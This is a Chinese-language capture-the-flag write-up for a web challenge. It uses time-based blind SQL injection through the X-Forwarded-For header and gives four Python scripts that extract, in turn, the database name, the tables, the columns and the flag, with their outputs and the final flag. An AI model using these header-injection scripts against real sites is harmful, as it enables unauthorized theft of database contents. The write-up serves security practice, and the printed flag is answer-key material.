知识点
时间盲注
解题步骤
爆出当前使用的数据库名:
#-*-coding:utf-8-*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
print('start.')
database_name =''
for i in range(1,100):
flag = 0
for str in guess:
headers = {
"X-Forwarded-For":"127.0.0.1'+"+"(select case when (substring((select schema_name from information_schema.SCHEMATA where schema_name = database()) from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1"%(i,str)
}
print(headers)
try:
res=requests.get(url,headers=headers,timeout=7)
except:
database_name+=str
flag = 1
print('database.',database_name)
break
if flag==0:
break
print(database_name)
运行结果:
web4
爆出web4中的表名:
#-*-coding:utf-8-*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.digits+string.punctuation+string.ascii_uppercase
print('start.')
tables =''
for i in range(1,100):
flag = 0
for str in guess:
headers = {
"X-Forwarded-For":"127.0.0.1'+"+"(select case when (substring((select group_concat(table_name separator '@') from information_schema.tables where table_schema = 'web4') from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1"%(i,str)
}
print(headers)
try:
res=requests.get(url,headers=headers,timeout=7)
except:
tables+=str
flag = 1
print('tables',tables)
break
if flag == 0 :
break;
print(tables)
运行结果:
client_ip@flag
爆出flag表中的列名:
#-*-coding:utf-8-*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.digits+string.punctuation+string.ascii_uppercase
print('start.')
columns =''
for i in range(1,100):
flag = 0
for str in guess:
headers = {
"X-Forwarded-For":"127.0.0.1'+"+"(select case when (substring((select group_concat(column_name separator '@') from information_schema.columns where table_name = 'flag') from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1"%(i,str)
}
print(headers)
try:
res=requests.get(url,headers=headers,timeout=7)
except:
columns+=str
flag = 1
print('columns',columns)
break
if flag == 0 :
print('finished.')
break;
print(columns)
运行结果:
flag
爆出flag:
#-*-coding:utf-8-*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.digits+string.punctuation+string.ascii_uppercase
print('start.')
f =''
for i in range(1,100):
flag = 0
for str in guess:
headers = {
"X-Forwarded-For":"127.0.0.1'+"+"(select case when (substring((select flag from flag) from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1"%(i,str)
}
print(headers)
try:
res=requests.get(url,headers=headers,timeout=7)
except:
f+=str
flag = 1
print(f)
break
if flag == 0 :
print('finished.')
break;
print(f)
运行结果:
cdbf14c9551d5be5612f7bb5d2867853
flag:
ctf{cdbf14c9551d5be5612f7bb5d2867853}